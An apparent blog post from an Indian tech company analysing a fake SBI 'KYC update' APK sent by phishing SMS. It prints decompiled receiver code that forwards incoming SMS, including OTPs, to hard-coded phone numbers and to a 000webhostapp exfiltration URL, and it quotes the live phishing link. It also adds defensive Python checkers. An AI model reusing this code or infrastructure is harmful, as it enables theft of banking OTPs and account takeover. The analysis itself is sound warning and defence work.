SBI Account Will be Suspended Today
Finally I too got the message from scammers.
You might face financial loss or be scammed if the scammer gets hold of your details.
SBI (State Bank of India) or any other legitimate financial institution will never ask you to provide personal information, such as your PAN card details or account information, through an unsolicited message or email.
To be exact, this is the message we received: a message from scammers urging us to install the application at the link provided.
Dear Customer your SBI Account Will be Suspended Today Please Update Your Pancard now visit the link install app https://sbl-1-kyc-app[.]web[.]app/SBl-KYC[.]apk
Only last week we informed our co-workers not to click on such links. Today I received it via SMS. And I was happy: not to install it, but to find out what the application does when it is installed.
Let’s see what the scammers are trying to do when we install the application from the link.
First the link.
It looks like the scammers are using Firebase hosting from Google to host and distribute the application (APK).
We did a quick reverse engineering and found the below.
<uses-sdk android:minSdkVersion="16" android:targetSdkVersion="33"/>
<uses-feature android:name="android.hardware.telephony" android:required="false"/>
<uses-permission android:name="android.permission.RECEIVE_SMS"/>
<uses-permission android:name="android.permission.SEND_SMS"/>
<uses-permission android:name="android.permission.INTERNET"/>
<uses-permission android:name="android.permission.READ_SMS"/>
First we had a look at the manifest file. It requests permissions to receive, read and send SMS (RECEIVE_SMS, READ_SMS and SEND_SMS), plus INTERNET.
<receiver android:name="com.example.myapplication.SmsReceiver" android:permission="android.permission.BROADCAST_SMS" android:enabled="true" android:exported="true">
<intent-filter>
<action android:name="android.provider.Telephony.SMS_RECEIVED"/>
</intent-filter>
</receiver>
<receiver android:name="com.example.myapplication.S1m2s3L4i5s6t7n8e9r0" android:permission="android.permission.BROADCAST_SMS" android:enabled="true" android:exported="true">
<intent-filter>
<action android:name="android.provider.Telephony.SMS_RECEIVED"/>
</intent-filter>
</receiver>
Below that we found two BroadcastReceiver registrations for SMS_RECEIVED, so the app is listening for every SMS the phone receives.
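As an added example (not code from the original post or from the analysed APK), here is a small Python triage script that checks an AndroidManifest.xml for the combination seen here: SMS permissions plus receivers registered for SMS_RECEIVED. The embedded manifest is constructed from the fragments quoted above, wrapped in a root element; the package name com.example.myapplication is taken from the receiver names on the page.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
SMS_PERMS = {"android.permission.RECEIVE_SMS", "android.permission.READ_SMS",
             "android.permission.SEND_SMS"}
SMS_RECEIVED = "android.provider.Telephony.SMS_RECEIVED"

# Constructed manifest: the fragments quoted in the post, wrapped in a root element.
SAMPLE_MANIFEST = f"""<manifest xmlns:android="{ANDROID_NS}" package="com.example.myapplication">
<uses-permission android:name="android.permission.RECEIVE_SMS"/>
<uses-permission android:name="android.permission.SEND_SMS"/>
<uses-permission android:name="android.permission.INTERNET"/>
<uses-permission android:name="android.permission.READ_SMS"/>
<application>
<receiver android:name="com.example.myapplication.SmsReceiver" android:exported="true">
<intent-filter><action android:name="{SMS_RECEIVED}"/></intent-filter>
</receiver>
<receiver android:name="com.example.myapplication.S1m2s3L4i5s6t7n8e9r0" android:exported="true">
<intent-filter><action android:name="{SMS_RECEIVED}"/></intent-filter>
</receiver>
</application>
</manifest>"""

def attr(elem, name):
    # Read an attribute from the android: namespace.
    return elem.get(f"{{{ANDROID_NS}}}{name}")

def triage_manifest(xml_text):
    """Return a dict of findings for an AndroidManifest.xml string."""
    root = ET.fromstring(xml_text)
    perms = {attr(p, "name") for p in root.iter("uses-permission")}
    sms_receivers = []
    for r in root.iter("receiver"):
        actions = {attr(a, "name") for a in r.iter("action")}
        if SMS_RECEIVED in actions:
            sms_receivers.append(attr(r, "name"))
    # An app that can see incoming SMS, can send SMS, and registers an
    # SMS_RECEIVED receiver can forward OTPs; INTERNET adds a second exfil path.
    forwarder = ("android.permission.SEND_SMS" in perms and
                 bool(sms_receivers) and
                 bool(perms & {"android.permission.RECEIVE_SMS", "android.permission.READ_SMS"}))
    return {
        "package": root.get("package"),
        "sms_permissions": sorted(perms & SMS_PERMS),
        "sms_receivers": sms_receivers,
        "internet": "android.permission.INTERNET" in perms,
        "default_template_package": (root.get("package") or "").startswith("com.example."),
        "likely_sms_forwarder": forwarder,
    }
```

The default_template_package flag is a weak signal on its own: com.example.* is the IDE template package name, which legitimate published apps rarely keep.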
Let's dig further into each receiver.
if (obj2 != null) {
SmsMessage smsMessage = Build.VERSION.SDK_INT >= 23 ? SmsMessage.createFromPdu(bArr, (String) obj2) : null;
Intrinsics.checkExpressionValueIsNotNull(smsMessage, "currentMessage");
String string = sharedPreferences.getString("phoneNumber", "+916306015875");
sharedPreferences.getString("phoneNumber", "+917908459827");
sharedPreferences.getString("phoneNumber", "+918108060160");
sharedPreferences.getString("phoneNumber", "+917065860860");
sharedPreferences.getString("phoneNumber", "+917304499902");
sharedPreferences.getString("phoneNumber", "+919634224747");
sharedPreferences.getString("phoneNumber", "+919004676782");
String displayMessageBody = smsMessage.getDisplayMessageBody();
if (smsMessage.getMessageClass() != SmsMessage.MessageClass.CLASS_0) {
smsManager.sendTextMessage(string, null, displayMessageBody, null, null);
} else {
return;
}
}
Here is a brief explanation of what each line of code is doing:
- The first line declares a variable called smsMessage of type SmsMessage. Its value depends on the Android version installed on the device: if the Android version is 23 or above, the createFromPdu method is used to create an SmsMessage object from a Protocol Data Unit (PDU) byte array (bArr) and a String object (obj2); if the Android version is below 23, smsMessage is assigned null.
- The Intrinsics.checkExpressionValueIsNotNull method checks that smsMessage is not null, so that the getDisplayMessageBody method called later on the variable will not throw a NullPointerException.
- The next few lines retrieve a phone number from shared preferences. The getString method looks up the key "phoneNumber", with hard-coded phone numbers supplied as default values in case the key is not found; only the first result is kept, in the variable string, and the remaining calls discard their results.
- The getDisplayMessageBody method returns the message body of the smsMessage object.
- The getMessageClass method determines the message class of the smsMessage object. If the message class is not SmsMessage.MessageClass.CLASS_0, the sendTextMessage method is called on smsManager to send a text message containing the message body (i.e. the SMS we received, displayMessageBody) to the phone number stored in the string variable.
- If the message class is SmsMessage.MessageClass.CLASS_0, the method returns without sending any text message.
Let’s have a look at another receiver.
public void onReceive(Context context, Intent intent) {
try {
Bundle extras = intent.getExtras();
if (extras != null) {
for (Object obj : (Object[]) extras.get("pdus")) {
SmsMessage createFromPdu = SmsMessage.createFromPdu((byte[]) obj);
String displayOriginatingAddress = createFromPdu.getDisplayOriginatingAddress();
String displayMessageBody = createFromPdu.getDisplayMessageBody();
Toast.makeText(context, "From: " + displayOriginatingAddress, 0).show();
sendSMS(context, displayOriginatingAddress, displayMessageBody);
}
}
} catch (Exception unused) {
Log.e("Error", "Failed to read SMS!");
}
}
public void sendSMS(Context context, String str, String str2) {
Volley.newRequestQueue(context).add(new StringRequest(0, ("https://stickiest-variety.000webhostapp.com//save_sms0.php?phone=" + str) + "&msg=" + Uri.encode(str2), new SmsReceiver$$ExternalSyntheticLambda0(), new SmsReceiver$$ExternalSyntheticLambda1()));
}
Here is a brief explanation of what each line of code is doing:
- The onReceive method is called when a new SMS is received. It gets the extras from the intent, which contain the SMS message data. If there are extras, it loops through each PDU and creates an SmsMessage object from it. It then gets the sender's phone number and the message body, shows a toast with the sender's phone number, and sends the message to a server using the sendSMS method.
- The sendSMS method uses the Volley library to send an HTTP GET request to the server. It appends the sender's phone number to the URL as a parameter named "phone" and the message body, encoded with the Uri.encode method, as a parameter named "msg".
Based on the above findings, it seems that the scammers are intercepting incoming SMS and forwarding a copy to their mobile number (first receiver) and another copy to their server (second receiver).
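As an added example (not part of the original post), here is a Python check that flags web-proxy log entries matching the exfiltration request built by sendSMS above: a GET to save_sms0.php carrying phone and msg query parameters. The log lines are constructed for illustration, and the log format (client IP, host, method, URL) is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample log lines (client_ip host method url); the first mimics
# the request shape from the decompiled sendSMS method.
SAMPLE_LOG = """\
10.0.0.7 stickiest-variety.000webhostapp.com GET https://stickiest-variety.000webhostapp.com//save_sms0.php?phone=AX-SBIINB&msg=Your%20OTP%20for%20txn%20is%20482913.%20Do%20not%20share.
10.0.0.7 www.example.org GET https://www.example.org/index.html
10.0.0.9 api.example.net GET https://api.example.net/v1/status?phone=support&msg=hello
"""

OTP_RE = re.compile(r"\b\d{4,8}\b")

def parse_line(line):
    ip, host, method, url = line.split(maxsplit=3)
    return {"ip": ip, "host": host, "method": method, "url": url}

def is_sms_exfil(entry):
    """True if the request looks like an SMS body being leaked via the query string."""
    q = parse_qs(urlsplit(entry["url"]).query)
    if "phone" not in q or "msg" not in q:
        return False
    msg = q["msg"][0]   # parse_qs already URL-decodes the value
    # Require a body that looks like a real SMS (OTP-like digits or OTP wording),
    # so a generic ?phone=&msg= API call is not flagged.
    return bool(OTP_RE.search(msg)) or "otp" in msg.lower()

def find_exfil(log_text):
    entries = (parse_line(l) for l in log_text.splitlines() if l.strip())
    return [e for e in entries if is_sms_exfil(e)]

if __name__ == "__main__":
    for hit in find_exfil(SAMPLE_LOG):
        print(f"ALERT {hit['ip']} -> {hit['host']} {hit['url']}")
```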
Please do not click on the link or download any app from unverified sources.
This blog is only for informational purposes, to educate people about what this kind of application does.
Stay tuned and follow us for more.😉
Written by
Naveen Sakthivel, CTO
Dotworld Technologies Private Limited
https://dotworld.in